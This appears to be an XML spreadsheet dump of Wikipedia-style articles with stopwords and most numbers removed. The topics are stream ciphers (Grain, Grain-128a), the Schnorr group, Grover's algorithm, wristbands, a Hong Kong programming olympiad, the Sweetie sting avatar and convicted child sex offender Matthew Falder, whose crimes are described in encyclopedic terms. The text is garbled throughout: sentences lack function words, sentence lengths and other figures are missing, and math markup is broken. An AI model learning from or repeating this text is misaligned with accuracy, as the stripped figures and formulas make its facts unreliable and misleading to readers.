stage pre-output stream feedback polynomials {\displaystyle {\displaystyle stream stream {\displaystyle functionality grain 128a share pre-output stream {\displaystyle authentication optional stream definition depends upon {\displaystyle iv_{0}} when authentication enabled, functionality uses first {\displaystyle bits (where {\displaystyle size) start clocking initialise. stream assigned every shared pre-output stream. authentication enabled: {\displaystyle z_{i}=y_{2w+2i}} authentication disabled: {\displaystyle z_{i}=y_{i}} grain 128a supports tags size {\displaystyle bit, registers size {\displaystyle used, shift register( {\displaystyle accumulator( {\displaystyle create message {\displaystyle {\displaystyle length {\displaystyle m+1} {\displaystyle m_{l}=1} ensure i.e. {\displaystyle m1=1} {\displaystyle m2=10} different tags, also making impossible generate completely ignores input shift register initialisation. {\displaystyle 0\leq j\leq accumulator time {\displaystyle 0\leq i\leq denounce accumulator {\displaystyle a_{i}^{j}} initialisation when authentication enabled grain 128a uses first {\displaystyle bits pre-output stream( {\displaystyle initialise shift register accumulator. this done shift register: {\displaystyle r_{i}=y_{i+31}} {\displaystyle 0\leq i\leq accumulator: {\displaystyle a_{0}^{j}=y_{j}} {\displaystyle 0\leq j\leq generation shift register: shift register bits pre-output stream( {\displaystyle {\displaystyle r_{i+31}=y_{64+2i+1}} accumulator: {\displaystyle a_{i+1}^{j}=a_{i}^{j}+m_{i}r_{i+j}} {\displaystyle 0\leq i\leq final when cipher completed iterations final tag( {\displaystyle content accumulator: {\displaystyle t_{i}=a_{l+1}^{i}} {\displaystyle 0\leq i\leq references external links version grain-128 authentication</t>
  </si>
  <si>
    <t>Matthew Falder</t>
  </si>
  <si>
    <t>matthew alexander falder (born october 1988) convicted english serial offender blackmailer coerced victims online sending degrading images committing crimes third person rape assault. managed making threats victim saying would send family friends degrading info revealing pictures (which usually obtained earlier obtaining false trust victim) comply commands. falder behind anonymous accounts re-posted images gain higher status dark web. investigators said "revelled" getting images share hurtcore websites. national crime agency (nca), described "one prolific depraved offenders ever encountered." falder pleaded guilty charges complainants, making uk's prolific convicted offenders. february 2018 jailed years ordered serve years extended licence. court appeal later reduced term imprisonment years, extended licence years. early life career falder grew knutsford, cheshire. attended kings school macclesfield, cheshire, reported "excelled".after school attended clare college university cambridge, specialising seismic oceanography earning masters doctoral degrees. time arrest, working post-doctoral researcher lecturer geophysics university birmingham. falder well-liked peer group, described extroverted, funny larger life. sexual offences falder's offending dates back 2007, committed voyeurism secretly filming university housemates shared bathroom. would later inform housemate offending, laughed time.falders' online offending detected early 2009. falder manipulated young children photograph compromising positions offered images online. april 2015, discovered someone posting hurtcore websites name "666devil", later turned falder.nca officers arrested falder office place work june 2017. when read list offences suspected committing, falder remarked sounded "like sheet hell". falder's victims numbered took minutes read charges birmingham crown court. originally charged offences, pleaded guilty them; prosecution accepted this, ordered remain file. falder used various accounts several websites pose young girl woman named 'liz'. dark falder used names 'inthegarden', '666devil' 'evilmind'. falder seventy different online identities. lured people taking photographs humiliating situations. blackmailed person raping four-year-old child. falder engaged hurtcore, police characterised manipulating others performing acts "rape, murder, sadism, torture, paedophilia, blackmail, humiliation degradation". falder's victims years old; falder said online would willingly “mentally fuck added, sure care lives dies.” falder increased pressure victims, least four attempted suicide. when victims pleaded abuse else would kill themselves, falder replied images already would circulated internet anyway. falder maintained could caught said care victims lived died.in addition national crime agency (nca), investigation uncover identity involved gchq, homeland security, europol, australian federal police, zealand police, israel police; lasted four years. will kerr feels tech companies gave less ideal cooperation police enquiry. kerr maintains accounts closed possibly preventing police identifying victims identifying patterns offending. kerr fears delayed identifying offenders kerr wants government action make tech companies cooperate better future. detailed crimes blackmailing people eating faeces, licking toilet seats tampons persuading people food. they described "one prolific depraved offenders ever encountered".on october 2017, falder pleaded guilty offences victims, making prolific offenders british history. birmingham crown court february 2018, judge philip parker sentenced falder years prison, ordered serve years extended licence release. falder eligible parole least years old. parole board believes falder continues pose danger public children, serve full years prison. judge sentencing hearing described falder "internet highwayman" "warped sadistic" whose behaviour "cunning, persistent, manipulative cruel." after sentencing, investigators released footage arrest described falder "revelled" anguish pain caused.ruona iguyovwe, cps, said, “matthew falder highly manipulative individual clearly enjoyed humiliating many victims impact offending case significant. deliberately targeted young vulnerable victims. least three victims known attempted suicide others inflicted self-harm. there high degree sophistication significant planning falder encryption software technology electronic communication multiple fake online identities encrypted email addresses.” prosecutors stated falder lived double life, graduate cambridge university birmingham university researcher sexual predator night. police officer matt sutton said, years enforcement i’ve never come across offender whose sole motivation inflict profound anguish pain. matthew falder revelled i’ve also never known extremely complex investigation offender technologically savvy able stay hidden darkest recesses dark web. this investigation represents watershed moment. falder alone continue develop deliver capabilities nationally whole enforcement system stop offenders like wrecking innocent lives. commend victims bravery urge anyone abused online report there help available.’javed khan barnardo's stated, "this [32-year prison] sentence sends message paedophiles crimes while, hopefully giving child abuse victims confidence come forward seek justice. (...) barnardo’s wants encourage parents talk children potential dangers online know apps they’re using websites they’re visiting, help keep safe. barnardo’s also wants tech companies sign online code practice protect children, incorporate safety features designing products take action soon abuse becomes flagged. children young people need know report abuse appropriate relationships education."falder appealed sentence. october 2018, court appeal reduced term imprisonment years, extended licence years.a spokesperson university birmingham said, "the university shocked hear abhorrent crimes committed former post-doctoral researcher.”the university cambridge stated sentencing "actively pursuing" ways stripping falder academic qualifications. university could precedent removal process alumni. also sextortion peter scully references external links falder's arrest video police hiding place dark criminals</t>
  </si>
  <si>
    <t>Schnorr group</t>
  </si>
  <si>
    <t>schnorr group, proposed claus schnorr, large prime-order subgroup {\displaystyle \mathbb _{p}^{\times multiplicative group integers modulo {\displaystyle prime {\displaystyle generate group, generate {\displaystyle {\displaystyle {\displaystyle {\displaystyle p=qr+1} {\displaystyle {\displaystyle prime. then choose {\displaystyle range {\displaystyle 1&lt;h&lt;p} find {\displaystyle h^{r}\not \equiv 1\;({\text{mod}}\;p)} .this value {\displaystyle g=h^{r}{\text{ }}p} generator subgroup {\displaystyle \mathbb _{p}^{\times order {\displaystyle schnorr groups useful discrete based cryptosystems including schnorr signatures dsa. applications, typically {\displaystyle chosen large enough resist index calculus related methods solving discrete-log problem (perhaps 1024 3072 bits), {\displaystyle large enough resist birthday attack discrete problems, works group (perhaps bits). because schnorr group prime order, non-trivial proper subgroups, thwarting confinement attacks small subgroups. implementations protocols schnorr groups must verify appropriate integers supplied parties fact members schnorr group; {\displaystyle member group {\displaystyle 0&lt;x&lt;p} {\displaystyle x^{q}\equiv 1\;({\text{mod }}p)} member group except element {\displaystyle also generator group.</t>
  </si>
  <si>
    <t>Grover's algorithm</t>
  </si>
  <si>
    <t>quantum computing, grover's algorithm, also known quantum search algorithm, refers quantum algorithm unstructured search finds high probability unique input black function produces particular output value, using {\displaystyle o({\sqrt {n}})} evaluations function, {\displaystyle size function's domain. devised grover 1996.the analogous problem classical computation cannot solved fewer {\displaystyle o(n)} evaluations (because, average, check half domain chance finding right input). charles bennett, ethan bernstein, gilles brassard, umesh vazirani proved quantum solution problem needs evaluate function {\displaystyle \omega ({\sqrt {n}})} times, grover's algorithm asymptotically optimal. since researchers generally believe np-complete problems difficult search spaces essentially structure, optimality grover's algorithm unstructured search suggests (but prove) quantum computers cannot solve np-complete problems polynomial time.unlike quantum algorithms, provide exponential speedup classical counterparts, grover's algorithm provides quadratic speedup. however, even quadratic speedup considerable {\displaystyle large, grover's algorithm applied speed broad classes algorithms. grover's algorithm could brute-force 128-bit symmetric cryptographic roughly iterations, 256-bit roughly 2128 iterations. result, sometimes suggested symmetric lengths doubled protect future quantum attacks. applications limitations grover's algorithm, along variants like amplitude amplification, used speed broad range algorithms. particular, algorithms np-complete problems generally contain exhaustive search subroutine, sped grover's algorithm. current best algorithm 3sat example. generic constraint satisfaction problems also quadratic speedups grover. these algorithms require input given form oracle, since grover's algorithm applied explicit function, e.g. function checking bits satisfies 3sat instance. grover's algorithm also give provable speedups black-box problems quantum query complexity, including element distinctness collision problem (solved brassard–høyer–tapp algorithm). types problems, treats oracle function database, goal quantum query function times possible. cryptography grover's algorithm essentially solves task function inversion. roughly speaking, function {\displaystyle y=f(x)} evaluated quantum computer, grover's algorithm allows calculate {\displaystyle given {\displaystyle consequently, grover's algorithm gives broad asymptotic speed-ups many kinds brute-force attacks symmetric-key cryptography, including collision attacks pre-image attacks. however, necessarily efficient algorithm since, example, parallel algorithm able find collision sha2 efficiently grover's algorithm. limitations grover's original paper described algorithm database search algorithm, description still common. database analogy table function's outputs, indexed corresponding input. however, database represented explicitly. instead, oracle invoked evaluate item index. reading full database item item converting representation take longer grover's search. account effects, grover's algorithm viewed solving equation satisfying constraint. applications, oracle check constraint related search algorithm. this separation usually prevents algorithmic optimizations, whereas conventional search algorithms often rely optimizations avoid exhaustive search.the major barrier instantiating speedup grover's algorithm quadratic speedup achieved modest overcome large overhead near-term quantum computers. however, later generations fault-tolerant quantum computers better hardware performance able realize speedups practical instances data. problem description input grover's algorithm, suppose function {\displaystyle f:\{0,1,\ldots ,n-1\}\to \{0,1\}} "unstructured database" analogy, domain represent indices database, f(x) data points satisfies search criterion. additionally assume index satisfies f(x) call index goal identify access subroutine (sometimes called oracle) form unitary operator acts follows: {\displaystyle {\begin{cases}u_{\omega }|x\rangle =-|x\rangle &amp;{\text{for }}x=\omega {\text{, }}f(x)=1,\\u_{\omega }|x\rangle =|x\rangle &amp;{\text{for }}x\neq \omega {\text{, }}f(x)=0.\end{cases}}} this uses {\displaystyle -dimensional state space {\displaystyle {\mathcal {h}}} supplied register {\displaystyle n=\lceil \log _{2}n\rceil qubits. this often written {\displaystyle u_{\omega }|x\rangle =(-1)^{f(x)}|x\rangle grover's algorithm outputs probability least using {\displaystyle o({\sqrt {n}})} applications this probability made arbitrarily large running grover's algorithm multiple times. runs grover's algorithm found, expected number applications still {\displaystyle o({\sqrt {n}})} since twice average. alternative oracle definition this section compares oracle {\displaystyle u_{\omega oracle {\displaystyle u_{f}} different standard quantum oracle function this standard oracle, denoted uses ancillary qubit system. operation represents inversion (not gate) main system conditioned value f(x) ancillary system: {\displaystyle {\begin{cases}u_{f}|x\rangle |y\rangle =|x\rangle |\neg y\rangle &amp;{\text{for }}x=\omega {\text{, }}f(x)=1,\\u_{f}|x\rangle |y\rangle =|x\rangle |y\rangle &amp;{\text{for }}x\neq \omega {\text{, }}f(x)=0,\end{cases}}} briefly, {\displaystyle u_{f}|x\rangle |y\rangle =|x\rangle |y\oplus f(x)\rangle these oracles typically realized using uncomputation. given oracle, also implement since ancillary qubit state {\displaystyle |-\rangle ={\frac {1}{\sqrt {2}}}{\big (}|0\rangle -|1\rangle {\big )}=h|1\rangle {\displaystyle {\begin{aligned}u_{f}{\big (}|x\rangle \otimes |-\rangle {\big )}&amp;={\frac {1}{\sqrt {2}}}\left(u_{f}|x\rangle |0\rangle -u_{f}|x\rangle |1\rangle \right)\\&amp;={\frac {1}{\sqrt {2}}}\left(|x\rangle |f(x)\rangle -|x\rangle |1\oplus f(x)\rangle \right)\\&amp;={\begin{cases}{\frac {1}{\sqrt {2}}}\left(-|x\rangle |0\rangle +|x\rangle |1\rangle \right)&amp;{\text{if }}f(x)=1,\\{\frac {1}{\sqrt {2}}}\left(|x\rangle |0\rangle -|x\rangle |1\rangle \right)&amp;{\text{if }}f(x)=0\end{cases}}\\&amp;=(u_{\omega }|x\rangle )\otimes |-\rangle \end{aligned}}} grover's algorithm regardless oracle given. given, must maintain additional qubit state {\displaystyle |-\rangle apply place algorithm steps grover's algorithm given follows: initialize system uniform superposition states {\displaystyle |s\rangle ={\frac {1}{\sqrt {n}}}\sum _{x=0}^{n-1}|x\rangle perform following "grover iteration" {\displaystyle r(n)} times: apply operator {\displaystyle u_{\omega apply grover diffusion operator {\displaystyle u_{s}=2\left|s\right\rangle \left\langle s\right|-i} measure resulting quantum state computational basis.for correctly chosen value {\displaystyle output {\displaystyle |\omega \rangle probability approaching analysis shows eventual value {\displaystyle r(n)} satisfies {\displaystyle r(n)\leq {\big \lceil }{\frac {\pi }{4}}{\sqrt {n}}{\big \rceil implementing steps algorithm done using number gates linear number qubits. thus, gate complexity algorithm {\displaystyle o(\log(n)r(n))} {\displaystyle o(\log(n))} iteration. geometric proof correctness there geometric interpretation grover's algorithm, following observation quantum state grover's algorithm stays two-dimensional subspace step. consider plane spanned {\displaystyle |s\rangle {\displaystyle |\omega \rangle equivalently, plane spanned {\displaystyle |\omega \rangle perpendicular {\displaystyle \textstyle |s'\rangle ={\frac {1}{\sqrt {n-1}}}\sum _{x\neq \omega }|x\rangle grover's algorithm begins initial {\displaystyle |s\rangle lies subspace. operator {\displaystyle u_{\omega reflection hyperplane orthogonal {\displaystyle |\omega \rangle vectors plane spanned {\displaystyle |s'\rangle {\displaystyle |\omega \rangle i.e. acts reflection across {\displaystyle |s'\rangle this seen writing {\displaystyle u_{\omega form householder reflection: {\displaystyle u_{\omega }=i-2|\omega \rangle \langle \omega operator {\displaystyle u_{s}=2|s\rangle \langle s|-i} reflection {\displaystyle |s\rangle both operators {\displaystyle u_{s}} {\displaystyle u_{\omega take states plane spanned {\displaystyle |s'\rangle {\displaystyle |\omega \rangle states plane. therefore, grover's algorithm stays plane entire algorithm. straightforward check operator {\displaystyle u_{s}u_{\omega grover iteration step rotates state vector angle arcsin {\displaystyle \theta =2\arcsin {\tfrac {1}{\sqrt {n}}}} enough iterations, rotate initial state {\displaystyle |s\rangle desired output state {\displaystyle |\omega \rangle initial close state orthogonal {\displaystyle |\omega \rangle {\displaystyle \langle s'|s\rangle ={\sqrt {\frac {n-1}{n}}}.} geometric terms, angle {\displaystyle \theta {\displaystyle |s\rangle {\displaystyle |s'\rangle given {\displaystyle \sin {\frac {\theta }{2}}={\frac {1}{\sqrt {n}}}.} need stop state vector passes close {\displaystyle |\omega \rangle this, subsequent iterations rotate state vector away {\displaystyle |\omega \rangle reducing probability obtaining correct answer. exact probability measuring correct answer {\displaystyle \sin ^{2}\left({\big (}r+{\frac {1}{2}}{\big )}\theta \right),} (integer) number grover iterations. earliest time near-optimal measurement therefore {\displaystyle r\approx {\sqrt {n}}/4} algebraic proof correctness complete algebraic analysis, need find happens repeatedly apply {\displaystyle u_{s}u_{\omega natural eigenvalue analysis matrix. notice entire computation, state algorithm linear combination {\displaystyle {\displaystyle \omega write action {\displaystyle u_{s}} {\displaystyle u_{\omega space spanned {\displaystyle \{|s\rangle ,|\omega \rangle {\displaystyle u_{s}:a|\omega \rangle +b|s\rangle \mapsto [|\omega \rangle \,|s\rangle ]{\begin{bmatrix}-1&amp;0\\2/{\sqrt {n}}&amp;1\end{bmatrix}}{\begin{bmatrix}a\\b\end{bmatrix}}.} {\displaystyle u_{\omega }:a|\omega \rangle +b|s\rangle \mapsto [|\omega \rangle \,|s\rangle ]{\begin{bmatrix}-1&amp;-2/{\sqrt {n}}\\0&amp;1\end{bmatrix}}{\begin{bmatrix}a\\b\end{bmatrix}}.} basis {\displaystyle \{|\omega \rangle ,|s\rangle (which neither orthogonal basis whole space) action {\displaystyle u_{s}u_{\omega applying {\displaystyle u_{\omega followed {\displaystyle u_{s}} given matrix {\displaystyle u_{s}u_{\omega }={\begin{bmatrix}-1&amp;0\\2/{\sqrt {n}}&amp;1\end{bmatrix}}{\begin{bmatrix}-1&amp;-2/{\sqrt {n}}\\0&amp;1\end{bmatrix}}={\begin{bmatrix}1&amp;2/{\sqrt {n}}\\-2/{\sqrt {n}}&amp;1-4/n\end{bmatrix}}.} this matrix happens convenient jordan form. define arcsin {\displaystyle t=\arcsin(1/{\sqrt {n}})} {\displaystyle u_{s}u_{\omega }=m{\begin{bmatrix}e^{2it}&amp;0\\0&amp;e^{-2it}\end{bmatrix}}m^{-1}} {\displaystyle m={\begin{bmatrix}-i&amp;i\\e^{it}&amp;e^{-it}\end{bmatrix}}.} follows r-th power matrix (corresponding iterations) {\displaystyle (u_{s}u_{\omega })^{r}=m{\begin{bmatrix}e^{2rit}&amp;0\\0&amp;e^{-2rit}\end{bmatrix}}m^{-1}.} using form, trigonometric identities compute probability observing iterations mentioned previous section, {\displaystyle \left|{\begin{bmatrix}\langle \omega |\omega \rangle &amp;\langle \omega |s\rangle \end{bmatrix}}(u_{s}u_{\omega })^{r}{\begin{bmatrix}0\\1\end{bmatrix}}\right|^{2}=\sin ^{2}\left((2r+1)t\right).} alternatively, might reasonably imagine near-optimal time distinguish would angles −2rt apart possible, corresponds {\displaystyle 2rt\approx arcsin {\displaystyle r=\pi /4t=\pi /4\arcsin(1/{\sqrt {n}})\approx {\sqrt {n}}/4} then system state {\displaystyle [|\omega \rangle \,|s\rangle ](u_{s}u_{\omega })^{r}{\begin{bmatrix}0\\1\end{bmatrix}}\approx [|\omega \rangle \,|s\rangle ]m{\begin{bmatrix}i&amp;0\\0&amp;-i\end{bmatrix}}m^{-1}{\begin{bmatrix}0\\1\end{bmatrix}}=|\omega \rangle {\frac {1}{\cos(t)}}-|s\rangle {\frac {\sin(t)}{\cos(t)}}.} short calculation shows observation yields correct answer error {\displaystyle o\left({\frac {1}{n}}\right)} extensions variants multiple matching entries instead matching entry, matching entries, algorithm works, number iterations must {\textstyle {\frac {\pi }{4}}{\left({\frac {n}{k}}\right)^{1/2}}} instead {\textstyle {\frac {\pi }{4}}{n^{1/2}}.} there several ways handle case unknown. simple solution performs optimally constant factor: grover's algorithm repeatedly increasingly small values e.g., taking n/2, n/4, ..., taking {\displaystyle k=n/2^{t}} iteration matching entry found. with sufficiently high probability, marked entry found iteration {\displaystyle t=\log _{2}(n/k)+c} constant thus, total number iterations taken {\displaystyle {\frac {\pi }{4}}{\big (}1+{\sqrt {2}}+{\sqrt {4}}+\cdots +{\sqrt {\frac {n}{k2^{c}}}}{\big )}=o{\big (}{\sqrt {n/k}}{\big )}.} version algorithm used order solve collision problem. quantum partial search modification grover's algorithm called quantum partial search described grover radhakrishnan 2004. partial search, interested finding exact address target item, first digits address. equivalently, think "chunking" search space blocks, asking block target item?". many applications, search yields enough information target address contains information wanted. instance, example given grover, list students organized class rank, interested whether student lower 25%, 25–50%, 50–75% 75–100% percentile. describe partial search, consider database separated {\displaystyle blocks, size {\displaystyle b=n/k} partial search problem easier. consider approach would take classically pick block random, perform normal search rest blocks theory language, complement). find target, know block search. average number iterations drops {\displaystyle n/2} {\displaystyle (n-b)/2} grover's algorithm requires {\textstyle {\frac {\pi }{4}}{\sqrt {n}}} iterations. partial search faster numerical factor depends number blocks {\displaystyle partial search uses {\displaystyle n_{1}} global iterations {\displaystyle n_{2}} local iterations. global grover operator designated {\displaystyle g_{1}} local grover operator designated {\displaystyle g_{2}} global grover operator acts blocks. essentially, given follows: perform {\displaystyle j_{1}} standard grover iterations entire database. perform {\displaystyle j_{2}} local grover iterations. local grover iteration direct grover iterations block. perform standard grover iteration.the optimal values {\displaystyle j_{1}} {\displaystyle j_{2}} discussed paper grover radhakrishnan. might also wonder happens applies successive partial searches different levels "resolution". this idea studied detail vladimir korepin called binary quantum search. they proved fact faster performing single partial search. optimality grover's algorithm optimal sub-constant factors. that algorithm accesses database using operator must apply least {\displaystyle 1-o(1)} fraction many times grover's algorithm. extension grover's algorithm matching entries, π(n/k)1/2/4, also optimal. this result important understanding limits quantum computation. grover's search problem solvable logc applications would imply contained bqp, transforming problems grover-type search problems. optimality grover's algorithm suggests quantum computers cannot solve np-complete problems polynomial time, thus contained bqp. shown class non-local hidden variable quantum computers could implement search {\displaystyle -item database {\displaystyle o({\sqrt[{3}]{n}})} steps. this faster {\displaystyle o({\sqrt {n}})} steps taken grover's algorithm. also amplitude amplification shor's algorithm (for factorization) brassard–høyer–tapp algorithm (for solving collision problem) notes references grover l.k.: fast quantum mechanical algorithm database search, proceedings, 28th annual symposium theory computing, (may 1996) grover l.k.: from schrödinger's equation quantum search algorithm, american journal physics, 69(7): 769–777, 2001. pedagogical review algorithm history. grover l.k.: quantum computing: weird logic subatomic world could make possible machines calculate millions times faster today sciences, july/august 1999, 24–30. nielsen, m.a. chuang, i.l. quantum computation quantum information. cambridge university press, 2000. chapter what's quantum phone book?, grover, lucent technologies external links davy wybiral. "quantum circuit simulator". archived original 2017-01-16. retrieved 2017-01-13. craig gidney (2013-03-05). "grover's quantum search algorithm". françois schwarzentruber (2013-05-18). "grover's algorithm". alexander prokopenya. "quantum circuit implementing grover's search algorithm". wolfram alpha. "quantum computation, theory of", encyclopedia mathematics, press, 2001 [1994] roberto maestre (2018-05-11). "grover's algorithm implemented github. bernhard ömer. "qcl programming language quantum computers". retrieved 2022-04-30. implemented /qcl-0.6.4/lib/grover.qcl</t>
  </si>
  <si>
    <t>Entry wristband</t>
  </si>
  <si>
    <t>wristbands encircling strips worn wrist lower forearm. term used refer bracelet-like band, similar wristwatch, cuff part sleeve covers wrist, decorative functional bands worn wrist many different reasons. wristbands often worn used similarly event passes lanyards information allow people entry events. these wristbands made loops plastic placed around wrist used identification purposes (demonstrating wearer's authorization venue, example). another type wristband sweatband; usually made towel-like terrycloth material. these usually used wipe sweat forehead sport known used badge fashion statement. practice common mid-1980s punk subculture sock fashion elastic type wristband. silicone wristbands early-to-mid-2000s (decade), bracelets often made silicone became popular. they worn demonstrate wearer's support cause charitable organization, similar awareness ribbons. such wristbands sometimes called awareness bracelets distinguish types wristbands. early 2007 became increasingly popular item sold merchandise concerts sporting events worldwide. wristbands bearing official logos trademarks enabled seller offer price point merchandise option fans. silicone wristbands also called wristbands, jelly wristbands, rubber wristbands fundraising wristbands. wristbands made silicone material. ultra violet wristbands ultra violet sensitive silicone wristbands appear clear/white light, exposed ultra violet light sunlight wristbands' color changes blue fuchsia. these bands used reminders people apply sunscreen stay shade summer days. hospital wristbands hospital wristbands commonly used safety device identifying patients undergoing medical care (see patient safety medical identification tag). available variety sizes accommodate patients small newborns large obese adults, hospital wristbands handwritten, embossed, laser-printed thermal-imaged names, pictures, medical record numbers, barcodes personal identifiers. laser printing thermal imaging—the advanced technologies personalizing hospital wristbands—support fonts, colors barcodes improved patient safety electronic patient medication tracking. handwritten embossed wristbands remain widespread use, however, despite findings compromised safety reported 2007. national patient safety agency (npsa) found many 2,900 patients year receiving wrong medical care hospital staff's inability read damaged otherwise illegible patient information handwritten embossed wristbands. event wristbands colored wristbands often given people attending events music festivals gigs access control measure. counterfeit wristbands increasingly common.silicone cristbands (some times referred bracelets) popular fundraising showing support cause. event organizer might create custom wristband give sell interested event supporting cause. some people keep wristbands souvenirs wear wristbands event show events went to.further uses wristband event ticketing music festivals sporting events include (near field communication) chip would allow contactless payment concessions turnstiles. wristbands ideal dark environments night clubs bars outdoor venues patrons afar festivals theme parks. addition styles colored wristbands used listed hospital patient bands serve extra safety reminder alert allergies. they standard color written labeling "fall risks" (which come medical conditions, injuries and/or medications used possibility causing increased safety risk warning), "allergies" cover allergic reactions vast list band type risks), "latex allergies" make sure medical safety gloves made latex immediate risk allergies), amongst several important cautions would protect patient preventing iatrogenic mistakes, reducing additional medical complications. also bracelet diving watch#watchstrap/bracelet power balance smart band smartwatch wrist brace references</t>
  </si>
  <si>
    <t>Hong Kong Olympiad in Informatics</t>
  </si>
  <si>
    <t>hong kong olympiad informatics (hkoi; 香港電腦奧林匹克競賽) annual programming competition secondary school students hong kong, emphasizing problem solving techniques programming skills. co-organized hong kong association computer education (hkace) hong kong education bureau (edb). serves preliminary contest international, national regional competitions china national olympiad informatics (noi) international olympiad informatics (ioi). first hkoi held 1997. history hong kong first participated 1992. order select representatives hong kong delegation team, selection test held months competition. following years, hong kong started sending teams competitions, including searcc international schools' software competition (issc) 1993, software competition youths (scy) 1994 china national olympiad informatics 1995. selection tests separately administered competitions, purpose test solely select team members competitions. considerable amount resources used organize tests. tests popular among students hong kong. 1996, hong kong association computer education, hong kong computer society education department hong kong (now education bureau) jointly organized joint selection contest replace selection tests. students selected seeds hong kong teams. they received intensive training topics like data structures algorithms. after that, team formation test conducted select hong kong representatives among seeds. another team formation test conducted searcc-issc scy. 1997, joint selection contest renamed hong kong olympiad informatics. prizes awarded students good results hkoi, invited join hkoi training team. limit number participants school, schools organize team formation test select students take part hkoi. structure competition groupings participants hkoi divided groups. junior group consists students aged below, senior group consists students aged below. rationale groups limit searcc-issc requires participants aged below. another advantage junior group allow young students enter hkoi training team without compete experienced senior students. competition format competition format hkoi changed times since introduction joint selection contest 1996. joint selection contest conducted written format. programs written answer sheet. difficult participants markers. participants could rely computer verify correctness programs, markers read every line program understand underlying algorithm. 1997, competition split heat final event. heat event consists written paper. outstanding students heat event proceed enter 2-hour final event, consists programming tasks similar ioi. heat event essential limited number computers provided final event. however, change competition format eliminate need marking based hand-written programs. 1998, heat event replaced pre-competition assessment. participants asked work pre-competition assessment task submit floppy diskette containing source code executable programs. list finalist determined solely programs submitted. however, raised concerns fairness competition, since ensure submitted program really written participant. time, programming language allowed pascal. 1999, heat event reinstalled. this time, heat event consisted single paper multiple choice problems improve efficiency marking papers. this important number participants increased several hundred students. 2000, duration final event increased hours. 2003, fill-in-the-blank problems added heat event, aiming dimension question paper. 2004, added list allowed programming languages. 2009, competition consists heat event multiple choice fill-in-the-blanks problems, final event consists programming tasks solved hours. programming languages allowed pascal, c++. different sets problem used junior senior group respectively. since 2015/16, number tasks reduced question enumeration), format like (batch score real time feedback). awards about half finalists awarded prizes. prizes awarded gold, silver bronze, ratio approximately 1:2:3. only performance final event considered. students junior group senior group ranked separately. prize winners invited join hkoi training team intensive training. team formation test usually held around select delegates noi. important people poon wing-chi, irwin. first gold medallist hong kong. yung-chun, justin. represented hong kong external competitions single year. chi-yung. represented hong kong external competitions. also person hong kong medals. employed google 2006 [1]. chi-man, alias second gold medallist hong kong. kit. third gold medalist hong kong. fact first participation year (2006) hkoi ioi. chan hing-lun. first medalist hong kong (1992) references external links hong kong olympiad informatics official homepage</t>
  </si>
  <si>
    <t>Sweetie (internet avatar)</t>
  </si>
  <si>
    <t>sweetie computer animated child created children's rights organization terre hommes sting operation. used lure online sexual predators providing personally-identifiable information, information could reported enforcement agencies. background 2013, dutch branch terre hommes, noting efforts combat child tourism impoverished countries resulted pedophiles instead seeking victims online, joined forces local advertising agency lemz first preferred remain anonymous create animated, photorealistic image 10-year-old filipina girl. sweetie worked 'puppeteer' sweetie would enter chat room, claiming ten-year-old philippine girl. sexual predators would open webcam connections 'her', programmers would animate sweetie necessary real time motion capture. dialogue sweetie predator progressed, predator would make wire transfer provide skype address. once information gathered, chat sweetie would shut down, information given local police interpol.after receiving letter united nations, team advertising agency lemz admitted behind initiative. strategy director lemz mark woerde gave public interview dutch show late night explain intervention make clear, security reasons, longer involved terre hommes, sweetie police activities. outcome during weeks operation, sweetie contacted 20,000 users countries. terre hommes identified 1,000 suspected predators, passed names, addresses, social media accounts interpol.the first arrest resulting sweetie-gleaned information occurred brisbane, australia, february 2014; however, troels ørting jørgensen european cybercrime centre expressed concerns judges consider sweetie entrapment, thereby rule inadmissible data ultimately sourced sweetie. sweetie arrest people australia. 2014, australian became first person convicted result sting operation.sweetie retired, "will used again". also child exploitation online protection centre internet safety creep catchers negobot references</t>
  </si>
  <si>
    <t>Grain (cipher)</t>
  </si>
  <si>
    <t>grain stream cipher submitted estream 2004 martin hell, thomas johansson willi meier. selected final estream portfolio profile estream project. grain designed primarily restricted hardware environments. accepts 80-bit 64-bit specifications recommended maximum length output (key, pair. number potential weaknesses cipher identified corrected grain 128a recommended cipher hardware environments providing 128bit security authentication. description grain's 160-bit internal state consists 80-bit linear feedback shift register (lfsr) 80-bit non-linear feedback shift register (nlfsr). grain updates lfsr nlfsr state every ciphertext released nonlinear filter function. 80-bit nlfsr updated nonlinear 5-to-1 boolean function linear input selected lfsr. nonlinear 5-to-1 function takes input bits nlfsr state. 80-bit lfsr updated 6-to-1 linear function. during keying operations output cipher additionally fed-back linear inputs nlfsr lfsr update functions. original grain version submission grain, 80-bit nlfsr four bits 80-bit lfsr supplied nonlinear 5-to-1 boolean function (that chosen balanced, correlation immune first order algebraic degree output linearly combined 80-bit nlfsr released output. updated grain version submission grain, 80-bit nlfsr four bits 80-bit lfsr supplied (slightly revised) nonlinear 5-to-1 boolean function output linearly combined bits 80-bit nlfsr released output. initialize cipher, 80-bit loaded directly 80-bits nlfsr 64-bit loaded 64-bits lfsr remaining high bits lfsr filled ones. cipher sealed rounds bits keystream generated fed-back linearly lfsr nlfsr update functions. cipher releases keystream output initialization process. grain's authors discuss complete diffusion rates grain initialization process grain version specifications: "for initialization different ivs, differing bit, probability shift register initializations close 0.5. simulations show achieved clockings." performance cipher designed allow rounds carried parallel, allowing faster implementations cost greater hardware use. security size bits size specified bits. authors claim cipher designed attack faster exhaustive search possible, hence best attack require computational complexity significantly lower 280. original grain version specifications, authors claim: "grain provides higher security several well known ciphers intended used hardware applications. well known examples ciphers used bluetooth a5/1 used gsm. these ciphers, also small hardware implementation, proven insecure. compared a5/1, grain provides higher security maintaining small hardware complexity." authors quote attack requiring complexity frames frame 2745 bits long). original grain version cipher broken recovery attack required complexity computations keystream bits determine 80-bit key. revised grain version specifications, cipher slightly revised output function nlfsr feedback function received minor change. specifications claim: "the filter function quite small, variables nonlinearity however, partly compensated fact inputs taken nlfsr. input nlfsr depend nonlinearily [sic] bits state, lfsr nlfsr. small filter function also compensated adding bits linearily [sic] nlfsr suitable positions form output function." october 2006, recovery attacks better brute force attack known grain version 1.0. however, related-key attack published september 2006 ozgul kucuk paper "slide resynchronization attack initialization grain 1.0". paper claims: find related keys initial values stream cipher grain 1.0. (k,iv) pair exist related (k’,iv’) pair probability 1/22 generates 1-bit shifted keystream. although result efficient recovery attack yet, indicates weakness initialization could overcomed [sic] little effort." references external links estream page grain</t>
  </si>
  <si>
    <t>Equihash</t>
  </si>
  <si>
